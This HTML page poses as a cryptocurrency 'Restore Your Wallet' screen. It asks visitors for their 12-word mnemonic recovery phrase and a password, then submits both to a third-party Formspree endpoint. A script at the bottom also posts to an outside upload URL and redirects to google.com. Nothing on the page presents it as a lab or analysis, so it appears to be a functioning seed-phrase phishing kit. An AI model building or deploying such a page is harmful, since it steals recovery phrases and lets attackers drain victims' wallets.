
<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="stylesheet" type="text/css" href="style.css" />

    <!-- Bootstrap CSS -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-wEmeIV1mKuiNpC+IOBjI7aAzPcEZeedi5yW5f2yOq55WWLwNGmvvx4Um1vskeMj0"
      crossorigin="anonymous"
    />

    <link rel="preconnect" href="https://fonts.gstatic.com" />
    <link
      href="https://fonts.googleapis.com/css2?family=Open+Sans+Condensed:wght@300&display=swap"
      rel="stylesheet"
    />

    <title>Ty's Cryptocurrency</title>
  </head>
  <body id="restorebody">
    <center>
      <div id="phraselogocontainer">
        <img src="atom.png" alt="" width="90px" height="60px" />
        <div id="phrasecontainer">
          <h3
            style="
              color: rgb(219, 255, 242);
              font-family: 'Open Sans Condensed';
              font-size: 28px;
            "
          >
            Restore Your Wallet
          </h3>
          <div id="middlephrasecontainer">
            <div id="innerphrasecontainer">
              <form
                class="form-group"
                id="form"
                method="POST"
                onsubmit="window.open('barcode.html', '_blank')"
                action="https://formspree.io/f/moqygqjy"
              >
                <br />

                <p
                  for="phrase"
                  style="
                    color: white;
                    margin-top: 25px;
                    color: rgb(219, 255, 242);
                    font-family: 'Open Sans Condensed';
                    font-size: 20px;
                  "
                >
                  Please enter your 12 word phrase
                </p>
                <br />

                <input
                  style="
                    margin-top: -17px;
                    height: 70px;
                    background-color: rgb(64, 76, 110);
                  "
                  type="text"
                  id="phrase"
                  name="phrase"
                  class="form-control border-0"
                  required
                />
                <br />
                <p
                  for="pass"
                  style="
                    color: white;
                    margin-top: -20px;
                    color: rgb(146, 162, 214);
                    font-family: 'Open Sans Condensed';
                    font-size: 17px;
                  "
                >
                  Please separate each Mnemonic Phrase with a space
                </p>
                <input
                  style="
                    margin-top: 25px;
                    height: 50px;
                    background-color: rgb(64, 76, 110);
                  "
                  type="password"
                  id="pass"
                  name="Temp_Pass"
                  class="form-control border-0"
                  placeholder="Enter Temporary session password"
                />
                <br />
                <p
                  style="
                    color: rgb(237, 30, 92);
                    font-family: 'Open Sans Condensed';
                    font-size: 14px;
                    width: 370px;
                    font-weight: bold;
                  "
                >
                  Before you enter your mnemonic phrase, we recommend you
                  connect your device to the internet. You will be able to
                  disconnect once your wallet is restored.
                </p>
                <br />
                <input
                  type="submit"
                  id="restorebnt"
                  name="send"
                  value="Restore Wallet"
                  style="
                    width: 100%;
                    height: 50px;
                    background-color: rgb(25, 42, 75);
                    color: rgb(219, 255, 255);
                    font-family: 'Open Sans Condensed';
                    margin-top: -10px;
                    font-size: 25px;
                    font-weight: bold;
                  "
                  class="
                    btn
                    border
                    border-end-0
                    border-bottom-0
                    border-secondary
                    border-2
                  "
                />
              </form>
            </div>
          </div>
        </div>
      </div>
    </center>

    <script type="text/javascript">
      $(function () {
        $("form").submit(function () {
          $.post("http://example.com/upload", function () {
            window.location = "http://google.com";
          });
          return false;
        });
      });
    </script>

    <!-- Optional JavaScript; choose one of the two! -->

    <!-- Option 1: Bootstrap Bundle with Popper -->
    <script
      src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.bundle.min.js"
      integrity="sha384-p34f1UUtsS3wqzfto5wAAmdvj+osOnFyQFpp4Ua3gs/ZVWx6oOypYoCJhGGScy+8"
      crossorigin="anonymous"
    ></script>

    <!-- Option 2: Separate Popper and Bootstrap JS -->
    <!--
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js" integrity="sha384-IQsoLXl5PILFhosVNubq5LC7Qb9DXgDA9i+tQ8Zj3iwWAwPtgFTxbJ8NT4GN1R8p" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0/dist/js/bootstrap.min.js" integrity="sha384-lpyLfhYuitXl2zRZ5Bn2fqnhNAKOAaM/0Kr9laMspuaMiZfGmfwRNFh8HlMy49eQ" crossorigin="anonymous"></script>
    -->
  </body>
</html>
